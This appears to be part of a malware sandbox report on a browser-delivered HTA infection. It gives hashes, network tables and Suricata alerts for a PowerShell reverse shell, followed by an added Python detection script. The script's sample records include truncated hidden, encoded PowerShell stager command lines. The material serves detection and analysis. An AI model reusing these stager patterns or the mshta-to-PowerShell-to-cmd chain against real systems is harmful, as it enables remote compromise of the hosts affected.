2984 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F | binary | 1A00FE93B412BC4C0368E41D58A57DA6 | 6EB06CD3932515F8721C94BAFE8765F7E995A9762E49208113FC0283F1569FC8
2984 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | compressed | F7DCB24540769805E5BB30D193944DCE | 6B88C6AC55BBD6FEA0EBE5A760D1AD2CFCE251C59D0151A1400701CB927E36EA
2984 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F | der | 58A71F87AF282C6F1BE4382B43CF019A | 5FFD69796323104DA230E13AC796184F4A4651AC8B943E17D4FBBC680BA3D6FB
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2984 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://crl3.digicert.com/Omniroot2025.crl | US | der | 7.78 Kb | whitelisted |
2984 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | der | 471 b | whitelisted |
2984 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8Ull8gIGmZT9XHrHiJQeI%3D | US | der | 1.47 Kb | whitelisted |
2984 | iexplore.exe | GET | 200 | 67.27.154.126:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?e66b6ea27af8c94a | US | compressed | 4.70 Kb | whitelisted |
2984 | iexplore.exe | GET | 200 | 67.27.154.126:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?d7294ce1c16f410e | US | compressed | 4.70 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2984 | iexplore.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
888 | powershell.exe | 40.113.243.243:80 | — | Microsoft Corporation | US | malicious |
3196 | powershell.exe | 40.113.243.243:80 | — | Microsoft Corporation | US | malicious |
2984 | iexplore.exe | 13.107.21.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
2984 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2984 | iexplore.exe | 67.27.154.126:80 | ctldl.windowsupdate.com | Level 3 Communications, Inc. | US | unknown |
2984 | iexplore.exe | 204.79.197.200:443 | ieonline.microsoft.com | Microsoft Corporation | US | whitelisted |
3132 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2984 | iexplore.exe | 23.2.175.10:443 | go.microsoft.com | Akamai International B.V. | US | malicious |
Domain | IP | Reputation
---|---|---
api.bing.com | — | whitelisted
www.bing.com | — | whitelisted
ctldl.windowsupdate.com | — | whitelisted
ocsp.digicert.com | — | whitelisted
crl3.digicert.com | — | whitelisted
iecvlist.microsoft.com | — | whitelisted
r20swj13mr.microsoft.com | — | whitelisted
ieonline.microsoft.com | — | whitelisted
go.microsoft.com | — | whitelisted
PID | Process | Class | Message |
---|---|---|---|
888 | powershell.exe | A Network Trojan was detected | ET TROJAN Win32/Suspected Reverse Shell Connection |
888 | powershell.exe | Successful Administrator Privilege Gain | GPL EXPLOIT Microsoft cmd.exe banner |
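The two Suricata alerts fire only once PID 888 is already talking to 40.113.243.243:80 (the cmd.exe banner on the wire is what "GPL EXPLOIT Microsoft cmd.exe banner" matches; "Successful Administrator Privilege Gain" is that rule's classtype label, not an observation, since every process in the table runs as admin at MEDIUM integrity). The same chain is visible earlier on the host in process-creation telemetry. The Python below is an added example, not part of the sandbox report: it runs three checks over records constructed from the process table (the page gives parent image names, not parent PIDs, so the PPIDs and the benign control record are assumptions, labelled in the code), and walks the ancestry so that cmd.exe is judged by what sits above it rather than by its own harmless command line.

```python
"""Host-side detection of the chain in the process table: a browser launching mshta.exe on
a cached .hta, mshta spawning PowerShell with a hidden encoded command, and a cmd.exe
running beneath that mshta. Pure Python over process-creation records (Sysmon EID 1 or
Security 4688 shaped), no external dependencies."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


# CONSTRUCTED from the table above. The page lists parent image names, not parent PIDs:
# PID 1000 for Explorer.EXE and the 2128 -> 888 -> 3072 links are assumptions made for
# the example, and PID 4100 is a benign control record the page does not contain.
EVENTS = [
    ProcEvent(2984, 1000, r"C:\Program Files\Internet Explorer\iexplore.exe",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" "C:\Users\admin\Desktop\index.html"'),
    ProcEvent(3596, 2984, r"C:\Windows\System32\mshta.exe",
              r'"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Policy.hta"'),
    ProcEvent(2128, 3596, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkA'),
    ProcEvent(888, 2128, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader('),
    ProcEvent(3072, 888, r"C:\Windows\system32\cmd.exe", "cmd"),
    ProcEvent(4100, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"powershell.exe" -ExecutionPolicy Bypass -File C:\Users\admin\scripts\backup.ps1'),
]

BROWSERS = ("iexplore.exe", "chrome.exe", "msedge.exe", "firefox.exe")
BROWSER_CACHE = re.compile(r"(?i)\\(temporary internet files|inetcache)\\")
# -e, -ec, -enc, -encodedcommand (PowerShell accepts any unambiguous prefix) followed by a
# base64-looking blob. -ExecutionPolicy has 14 letters after the e and a non-base64
# argument, so it never matches.
ENCODED_CMD = re.compile(r"(?i)(?:^|\s)-e[a-z]{0,13}\s+[A-Za-z0-9+/=]{16,}")
HIDDEN = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+(?:hidden|1)\b")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Image basenames from the parent upward; stops at an unknown PID or a cycle."""
    chain: List[str] = []
    seen = set()
    ev = by_pid.get(pid)
    while ev is not None and ev.ppid in by_pid and ev.ppid not in seen:
        seen.add(ev.ppid)
        ev = by_pid[ev.ppid]
        chain.append(basename(ev.image))
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every record that matches one of the three checks."""
    by_pid = {e.pid: e for e in events}
    hits: List[Tuple[str, int]] = []
    for e in events:
        name = basename(e.image)
        parents = ancestry(e.pid, by_pid)
        parent = parents[0] if parents else ""
        if name == "mshta.exe" and parent in BROWSERS and BROWSER_CACHE.search(e.cmdline):
            hits.append(("mshta_from_browser_cache", e.pid))
        if name == "powershell.exe" and ENCODED_CMD.search(e.cmdline) and HIDDEN.search(e.cmdline):
            hits.append(("hidden_encoded_powershell", e.pid))
        if name == "cmd.exe" and "mshta.exe" in parents:
            hits.append(("shell_under_mshta", e.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(rule, pid)
```

The second check deliberately does not fire on PID 888: its command line carries -w hidden but no encoded blob, which is why the ancestry check exists. Real telemetry gives you the parent PID directly, so the assumed links above are only needed because the page omits them.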